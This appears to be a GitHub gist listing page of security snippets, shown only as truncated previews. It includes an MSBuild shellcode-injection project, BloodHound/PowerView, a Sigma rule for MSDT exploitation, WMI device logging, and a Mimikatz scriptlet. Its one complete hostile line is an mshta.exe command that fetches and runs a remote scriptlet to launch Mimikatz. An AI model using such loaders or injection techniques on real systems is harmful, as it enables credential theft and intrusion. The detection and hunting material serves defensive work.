Eric vector-sec
vector-sec
/ msbuildQueueAPC.csproj
Created
August 30, 2017 13:11
MSBuild => CSC.exe Shellcode Inject using QueueUserAPC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <-- x86 --> | |
| <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj --> | |
| <!- x64 --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj --> | |
| <Target Name="Hello"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask |
vector-sec
/ binary_analysis_hunting.py
Created
July 2, 2021 18:27
— forked from rc-abodkins/binary_analysis_hunting.py
This script searches binaries within VMware Carbon Black EDR
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import argparse | |
| import os | |
| import configparser | |
| import csv | |
| import sys | |
| from os.path import exists | |
| import requests | |
| #Console Output coloring. Makes knowing if you have any errors/ warnings easier to identify | |
| err_Col = '\033[91m' |
vector-sec
/ Modified_Bloodhound.ps1
Created
August 10, 2016 17:24
This is a modified version of Bloodhound.ps1, a part of https://github.com/adaptivethreat/BloodHound/ The modification is simply adding a GroupName paramter to Get-BloodhoundData to use in conjunction with -CollectionMethod Group
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #requires -version 2 | |
| <# | |
| PowerSploit File: PowerView.ps1 | |
| Author: Will Schroeder (@harmj0y) | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Optional Dependencies: None |
vector-sec
/ detection.yml
Created
May 31, 2022 16:51
— forked from kevthehermit/detection.yml
Office --> MSDT --> RCE
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| title: Sysmon Office MSDT | |
| id: c95ed569-5da4-48b3-9698-5e429964556c | |
| description: Detects MSDT Exploit Attempts | |
| status: experimental | |
| author: kevthehermit | |
| date: 2022/05/30 | |
| references: | |
| - https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon | |
| - https://gist.github.com/kevthehermit/5c8d52af388989cfa0ea38feace977f2 | |
| logsource: |
vector-sec
/ hid_ntevent_wmi_event_subscription
Created
August 4, 2016 04:35
An example of how to use permanent WMI event subscriptions to log that a keyboard/mouse was connected to the windows event log
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Based off @mattifestation's example: https://gist.github.com/mattifestation/aff0cb8bf66c7f6ef44a | |
| # Define the signature - i.e. __EventFilter | |
| $EventFilterArgs = @{ | |
| EventNamespace = 'root/cimv2' | |
| Name = 'HumanInterfaceDevice' | |
| Query = 'SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA "Win32_PointingDevice" OR TargetInstance ISA "Win32_KeyBoard"' | |
| QueryLanguage = 'WQL' | |
| } | |
| $InstanceArgs = @{ |
vector-sec
/ mimikatz.sct
Created
January 18, 2018 14:15
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Bandit" | |
| progid="Bandit" | |
| version="1.00" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| > |
vector-sec
/ Get-Token.ps1
Created
August 10, 2017 17:51
PowerShell script to enumerate all Process and Thread tokens.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-Token | |
| { | |
| foreach($proc in (Get-Process)) | |
| { | |
| if($proc.Id -ne 0 -and $proc.Id -ne 4) | |
| { | |
| try | |
| { | |
| $hProcess = OpenProcess -ProcessId $proc.Id -DesiredAccess PROCESS_QUERY_LIMITED_INFORMATION | |
| } |
OlderNewer